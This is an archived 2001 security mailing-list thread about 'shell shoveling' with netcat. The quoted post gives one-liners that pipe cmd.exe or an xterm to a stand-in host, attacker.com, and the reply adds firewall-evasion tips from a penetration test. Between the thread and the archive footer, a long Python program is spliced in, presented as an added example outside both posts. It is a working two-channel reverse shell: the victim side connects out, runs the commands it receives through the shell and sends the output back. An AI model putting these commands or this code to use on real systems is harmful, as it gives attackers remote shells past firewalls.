Re: Shell Shoveling?!?

From: bluefur0r bluefur0r (bluefur0rat_private)
Date: Tue Oct 02 2001 - 12:05:44 PDT


    That's rather amusing, because I used that exact command last night... except I changed the ports because of firewall reasons. The reason I had to use it was that they were running BlackIce on the webserver and a fw1 box was in front of that as well. A misconfigured firewall allowed outbound transmissions, and hence that exact command came into play. I suggest trying higher ports and not using port 80; I bet you 5 dollars that if you attempt to set up a listener on port 80 you'll get hit with Nimda before your shell gets to you =). It worked quite well, except do not try using commands like ftp (it seemed to mess with my listeners a bit). Instead use the ol' ftp -s: switch and create a file with the list of ftp commands. Hope this helps!
    blue
    On Tue, 2 Oct 2001 11:15:28 -0700, "Junginger, Jeremy" <jjungingerat_private> wrote:
    > 
    >-----BEGIN PGP SIGNED MESSAGE-----
    >Hash: SHA1
    >
    >Have you guys ever heard of shell shoveling? In playing with NetCat
    >and reading an infoworld article, I came across a couple of concepts
    >that I found fascinating.  Below are the explanations and command
    >lines:
    >
    >"If the attacker machine is listening with netcat on TCP 80 and 25,
    >and TCP 80 is allowed inbound and 25 outbound to/from the victim
    >through the firewall, then this command "shovels" a remote command
    >shell from victim to attacker.com."
    >
    >nc attacker.com 80 | cmd.exe | nc attacker.com 25
    >
    >"If Xterm (TCP 6000) is allowed outbound without restriction, then
    >the following command would be a nifty Unix equivalent to the above
    >example:"
    >
    >xterm -display attacker.com:0.0 &
    >
    >I am planning on using this in an upcoming p.t. and wanted to gain
    >your insights!  Thanks!
    >
    >
    >
    >-----BEGIN PGP SIGNATURE-----
    >Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
    >
    >iQA/AwUBO7oEDKlk83sSWEI4EQJT5gCgoed9mdrH4FMkU1vse5zBg1fkiqcAnAsv
    >0Em+lFGcjjX00Jd6eTEGSSFw
    >=BUzY
    >-----END PGP SIGNATURE-----
    >
    >----------------------------------------------------------------------------
    >This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    >Service. For more information on SecurityFocus' SIA service which
    >automatically alerts you to the latest security vulnerabilities please see:
    >https://alerts.securityfocus.com/
    >
    >
    
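The two-channel "shovel" quoted above (commands in on one TCP connection, shell output back out on a second), as an added example that is not part of either post. It is Python rather than netcat so that both sides can run together on localhost without a listener on the network: the attacker side opens two listeners on OS-chosen high ports (the "use higher ports, not 80" advice), and the victim side connects to both and pipes each command through the local shell. The END_OF_OUTPUT marker, the per-command timeout (a stand-in for the post's warning that interactive tools such as ftp wedge the listeners) and the function names are assumptions of this example; raw netcat has no such framing.

```python
import socket
import subprocess
import threading

# Marker the victim appends after each command's output so the operator can tell
# where one command's output ends. Assumption of this example: netcat's raw
# shovel sends no such framing, the operator just watches the output stream.
END_OF_OUTPUT = "<<EOC>>\n"


def victim_shovel(attacker_host, cmd_port, out_port, per_command_timeout=5.0):
    """Victim side of `nc attacker 80 | cmd.exe | nc attacker 25`.

    Commands arrive one per line on the first connection, are run through the
    local shell, and their output is sent back on the second connection. The
    timeout stands in for the interactive-tool problem described in the post:
    a command that sits waiting for a terminal would otherwise wedge the shovel.
    """
    cmd_sock = socket.create_connection((attacker_host, cmd_port))
    out_sock = socket.create_connection((attacker_host, out_port))
    with cmd_sock, out_sock, cmd_sock.makefile("r") as commands:
        for line in commands:
            command = line.rstrip("\r\n")
            if command == "exit":
                break
            try:
                proc = subprocess.run(command, shell=True, capture_output=True,
                                      text=True, timeout=per_command_timeout)
                output = proc.stdout + proc.stderr
            except subprocess.TimeoutExpired:
                output = "[shovel] command timed out (interactive tool?)\n"
            if output and not output.endswith("\n"):
                output += "\n"  # keep the marker on its own line
            out_sock.sendall((output + END_OF_OUTPUT).encode())


def attacker_session(commands, host="127.0.0.1"):
    """Attacker side: two listeners, as in the netcat example, on ephemeral ports.

    Returns the output collected for each command. The victim is started as a
    thread so the whole exchange runs on localhost; in the field only
    victim_shovel's logic executes on the compromised host.
    """
    cmd_srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    out_srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    for srv in (cmd_srv, out_srv):
        srv.bind((host, 0))  # port 0: let the OS pick a free high port
        srv.listen(1)
        srv.settimeout(10)   # never block forever if the victim fails to call back
    cmd_port = cmd_srv.getsockname()[1]
    out_port = out_srv.getsockname()[1]

    victim = threading.Thread(target=victim_shovel,
                              args=(host, cmd_port, out_port), daemon=True)
    victim.start()

    results = []
    with cmd_srv, out_srv:
        cmd_conn, _ = cmd_srv.accept()
        out_conn, _ = out_srv.accept()
        with cmd_conn, out_conn, out_conn.makefile("r") as output:
            for command in commands:
                cmd_conn.sendall((command + "\n").encode())
                chunk = []
                for line in output:
                    if line == END_OF_OUTPUT:
                        break
                    chunk.append(line)
                results.append("".join(chunk))
            cmd_conn.sendall(b"exit\n")
    victim.join(timeout=10)
    return results


if __name__ == "__main__":
    demo = ["echo hello", "echo shovel"]
    for cmd, out in zip(demo, attacker_session(demo)):
        print(f"$ {cmd}\n{out}", end="")
```

The ports are chosen by the OS here; against a real firewall you would pin them to whatever egress the rule set lets through, and a listener on port 80 will see background worm traffic before it sees your shell, exactly as the post warns.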
    



    This archive was generated by hypermail 2b30 : Thu Oct 04 2001 - 10:41:53 PDT